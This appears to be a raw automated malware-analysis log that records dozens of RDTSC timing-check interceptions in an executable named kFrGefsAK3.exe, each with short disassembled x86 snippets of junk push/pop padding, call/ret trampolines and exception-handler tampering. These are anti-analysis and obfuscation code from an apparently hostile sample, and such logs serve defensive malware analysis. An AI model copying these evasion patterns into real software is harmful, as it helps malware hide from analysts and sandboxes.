Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A3FB3 second address: 13A3FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A3FB7 second address: 13A3FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA278C0D01Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A572F second address: 13A5733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A5733 second address: 13A5737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A94CB second address: 13A94DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FA278C27B7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A8A93 second address: 13A8A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A8A97 second address: 13A8AE3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C27B76h 0x00000008 jmp 00007FA278C27B89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FA278C27B76h 0x00000016 js 00007FA278C27B76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f jmp 00007FA278C27B84h 0x00000024 popad 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A8AE3 second address: 13A8AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FA278C0D01Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A9324 second address: 13A9344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA278C27B7Ch 0x0000000b pop eax 0x0000000c je 00007FA278C27BA3h 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13A9344 second address: 13A9365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FA278C0D029h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AA791 second address: 13AA79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C27B7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AA982 second address: 13AA988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AAC14 second address: 13AAC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA278C27B76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AB7E8 second address: 13AB7EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AB7EE second address: 13AB7F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13ACA6F second address: 13ACA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA278C0D016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13ADC4D second address: 13ADC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AE509 second address: 13AE50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AE5A7 second address: 13AE5AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AF100 second address: 13AF106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AF106 second address: 13AF10A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13AF96C second address: 13AF988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007FA278C0D020h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B0FF2 second address: 13B1005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA278C27B76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FA278C27B76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B1005 second address: 13B1009 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B52F7 second address: 13B52FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B52FC second address: 13B5306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA278C0D016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B73F1 second address: 13B73F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B66DE second address: 13B66E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B73F5 second address: 13B7406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FA278C27B76h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B7406 second address: 13B7442 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 mov edi, eax 0x0000000a push 00000000h 0x0000000c mov edi, dword ptr [ebp+122D3449h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FA278C0D018h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 pop esi 0x00000034 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B7657 second address: 13B765B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B8559 second address: 13B8562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B8562 second address: 13B8566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B969E second address: 13B96AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BA496 second address: 13BA4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA278C27B7Dh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FA278C27B76h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BA4B4 second address: 13BA4BE instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13B96AD second address: 13B974C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FA278C27B76h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d cld 0x0000000e mov dword ptr [ebp+12449F36h], ecx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FA278C27B78h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 stc 0x00000036 mov dword ptr [ebp+1244716Ah], edx 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov edi, ecx 0x00000045 mov eax, dword ptr [ebp+122D048Dh] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007FA278C27B78h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 00000015h 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 jmp 00007FA278C27B7Fh 0x0000006a push FFFFFFFFh 0x0000006c call 00007FA278C27B86h 0x00000071 mov bx, 8E92h 0x00000075 pop edi 0x00000076 push eax 0x00000077 pushad 0x00000078 pushad 0x00000079 pushad 0x0000007a popad 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BC828 second address: 13BC8E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or edi, dword ptr [ebp+122D3266h] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov ebx, dword ptr [ebp+122D26E4h] 0x0000001f jmp 00007FA278C0D021h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FA278C0D018h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D576Ch], edi 0x0000004b mov eax, dword ptr [ebp+122D0859h] 0x00000051 mov dword ptr [ebp+122D1A80h], edx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FA278C0D018h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 0000001Dh 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 nop 0x00000074 push eax 0x00000075 push edx 0x00000076 jp 00007FA278C0D02Bh 0x0000007c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BC8E6 second address: 13BC8FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA278C27B78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FA278C27B76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C0636 second address: 13C0689 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D2207h], edx 0x00000014 push 00000000h 0x00000016 mov bx, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FA278C0D018h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D29C6h], ebx 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA278C0D01Ah 0x00000043 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C0689 second address: 13C068F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C068F second address: 13C0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BE776 second address: 13BE77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BD6D3 second address: 13BD6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF6B4 second address: 13BF6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C0888 second address: 13C088E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BD6DB second address: 13BD6DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF6B8 second address: 13BF731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FA278C0D027h 0x0000000d nop 0x0000000e push esi 0x0000000f pop edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FA278C0D018h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov edi, edx 0x0000003a mov eax, dword ptr [ebp+122D1385h] 0x00000040 clc 0x00000041 push FFFFFFFFh 0x00000043 jg 00007FA278C0D02Ah 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BD6DF second address: 13BD6F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jo 00007FA278C27B7Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF731 second address: 13BF735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C2547 second address: 13C25E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA278C27B78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov bx, 9B14h 0x00000029 jmp 00007FA278C27B87h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1D38h], edi 0x00000036 pushad 0x00000037 call 00007FA278C27B7Ch 0x0000003c adc ax, AE1Ah 0x00000041 pop eax 0x00000042 jmp 00007FA278C27B7Eh 0x00000047 popad 0x00000048 push 00000000h 0x0000004a mov edi, ebx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push esi 0x0000004f jmp 00007FA278C27B7Eh 0x00000054 pop esi 0x00000055 pop eax 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jno 00007FA278C27B76h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF735 second address: 13BF74D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D024h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C25E8 second address: 13C25F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF74D second address: 13BF752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C25F2 second address: 13C25F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13BF752 second address: 13BF758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C171C second address: 13C1726 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA278C27B7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C1726 second address: 13C17A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FA278C0D018h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D26E9h], ecx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FA278C0D018h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 movzx ebx, cx 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 add dword ptr [ebp+122D2D64h], esi 0x00000058 mov eax, dword ptr [ebp+122D0545h] 0x0000005e mov dword ptr [ebp+122D21D0h], ecx 0x00000064 push FFFFFFFFh 0x00000066 push eax 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jp 00007FA278C0D016h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C17A4 second address: 13C17A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 13C3510 second address: 13C3588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push edx 0x0000000c mov dword ptr [ebp+122D3386h], edi 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007FA278C0D018h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov bx, 8500h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FA278C0D018h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 jmp 00007FA278C0D029h 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403428 second address: 140342E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140342E second address: 1403432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403432 second address: 1403441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA278C27B76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E56 second address: 1403E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D025h 0x00000009 popad 0x0000000a jbe 00007FA278C0D018h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E7B second address: 1403E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E81 second address: 1403E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1403E87 second address: 1403E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA278C27B76h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140830D second address: 1408316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14076F5 second address: 14076FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14076FA second address: 1407700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407700 second address: 140770C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA278C27B76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140770C second address: 1407716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14079C5 second address: 14079D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FA278C27B7Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14079D6 second address: 14079DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B4B second address: 1407B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b je 00007FA278C27B76h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B5D second address: 1407B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
